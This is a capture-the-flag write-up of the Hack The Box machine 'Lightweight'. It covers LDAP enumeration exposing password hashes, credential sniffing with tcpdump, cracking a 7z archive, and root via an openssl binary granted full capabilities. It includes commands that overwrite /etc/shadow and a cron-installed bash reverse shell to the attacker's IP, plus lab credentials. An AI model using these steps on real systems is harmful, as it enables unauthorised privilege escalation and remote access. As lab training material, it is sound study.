Today, we’re going to solve another CTF machine “Lightweight”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.119
  • Difficulty: Medium

Weakness

  • Abusing Linux Capabilities

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -Pn 10.10.10.119

Nmap Lightweight

22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

We got 3 Ports running SSH – 22 / HTTP – 80 / Ldap – 389. Let’s take a look at Ldap first.

LDAP Enumeration

Enumerating LDAP using ldapsearch tool.

ldapsearch -h 10.10.10.119 -p 389 -x -b dc=lightweight,dc=htb

ldapsearch -h 10.10.10.119 -p 389 -x -b dc=lightweight,dc=htb

# extended LDIF
#
# LDAPv3
# base <dc=lightweight,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lightweight.htb
dn: dc=lightweight,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: lightweight htb
dc: lightweight

# Manager, lightweight.htb
dn: cn=Manager,dc=lightweight,dc=htb
objectClass: organizationalRole
cn: Manager
description: Directory Manager

# People, lightweight.htb
dn: ou=People,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: People

# Group, lightweight.htb
dn: ou=Group,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: Group

# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
cn: ldapuser1
sn: ldapuser1
mail: [email protected]
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2R
 oai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1000
gidNumber: 1000
homeDirectory: /home/ldapuser1

# ldapuser2, People, lightweight.htb
dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
uid: ldapuser2
cn: ldapuser2
sn: ldapuser2
mail: [email protected]
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdms
 zYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1001
gidNumber: 1001
homeDirectory: /home/ldapuser2

# ldapuser1, Group, lightweight.htb
dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser1
userPassword:: e2NyeXB0fXg=
gidNumber: 1000

# ldapuser2, Group, lightweight.htb
dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser2
userPassword:: e2NyeXB0fXg=
gidNumber: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8

We found some interesting information such as,

Username: ldapuser1
Password: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv

Username: ldapuser2
Password: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

After decoding Base64 we got these hashes.

{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/

{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

The encryption is SHA512 i tried cracking it but didn’t work.

Enumeration

Let’s do some enumeration and browse URL http://10.10.10.119

Generally in CTF’s methodology we have to enumerate for hidden directories and files. But in this case it blocked us due to some-kind of firewall so we have to enumerate manually.

Going to user.php page it tells us that you’re SSH account is created.

“This server lets you get in with ssh. Your IP (10.10.14.17) is automatically added as userid and password within a minute of your first HTTP page request. We strongly suggest you to change your password as soon as you get in the box.”

Let’s login to SSH

We got nothing in current directory let’s find out what other users we have here cat /etc/passwd

Let’s enumerate more with LinEnum.sh script

After running the script we can see files with POSIX capabilities set.

Linux capabilities feature use to give a binary certain permissions which are needed to perform daily tasks without giving a user root permission or making it SUID binary.

The binary tcpdump has cap_net_admin,cap_net_raw+ep capabilities enabled.

/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

 **CAP_NET_RAW**
              * Use RAW and PACKET sockets;
              * bind to any address for transparent proxying.

Let’s run tcpdump and save the output.

tcpdump -i lo port 389 -w capture.cap -v

Let’s transfer capture.cap file into our local machine.

scp [email protected]:/home/10.10.14.17/capture.cap capture.cap

Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2

Now let’s go back to our SSH session and switch user with this current creds.

[[email protected] ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[[email protected] 10.10.14.17]$

We owned user.txt

Privilege Escalation

Let’s head towards getting root.txt flag. There’s a file backup.7z it’s password protected let’s transfer it to our local machine and try cracking it.

Let’s encode backup.7z into Base64 and decode into our local machine.

I used this tool to dictionary attack backup.7z

python main.py --files backup.7z --wordlist rockyou.txt

After extracting the 7z file we got some php files.

If we cat status.php | head -30

ldapuser1
f3ca9d298a553da117442deeb6fa932d

We got the ldapuser1 creds let’s su - ldapuser1

[[email protected] ~]$ su - ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d

let’s look at the files inside /home/ldapuser1/

We have some php files which doesn’t include any interesting information. Let’s check the capabilities of openssl and tcpdump binary.

[[email protected] ~]$ getcap -r .
./tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep
./openssl enc -base64 -in /root/root.txt -out ./root.txt.b64

Getting Root By Abusing Linux Capabilities

Let’s modify /etc/shadow file to modify root password using openssl capability.

[[email protected] ~]$ ./openssl enc -base64 -in /etc/shadow -out ./shadow.b64
[[email protected] ~]$ base64 -d shadow.b64 > shadow

We need to created a salted password using openssl let’s use root as username/password.

[[email protected] ~]$ openssl passwd -1 -salt root root
$1$root$9gr5KxwuEdiI80GtIzd.U0

Replace the salted password inside shadow file which we copied.

cat shadow | head -1

We can use openssl capabilities to replace our modified shadow file with original /etc/shadow file.

./openssl enc -in shadow -out /etc/shadow

And we got root!

We can also run cronjob and spawn a reverse shell as root.

[[email protected] ~]$ cp /etc/crontab .
[[email protected] ~]$ echo '* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.17/1337 0>&1' >> crontab                                
[[email protected] ~]$ base64 crontab > crontab.b64
[[email protected] ~]$ ./openssl enc -d -base64 -in crontab.b64 -out /etc/crontab

Now, let’s wait for a minute and start a listener and you’ll get shell.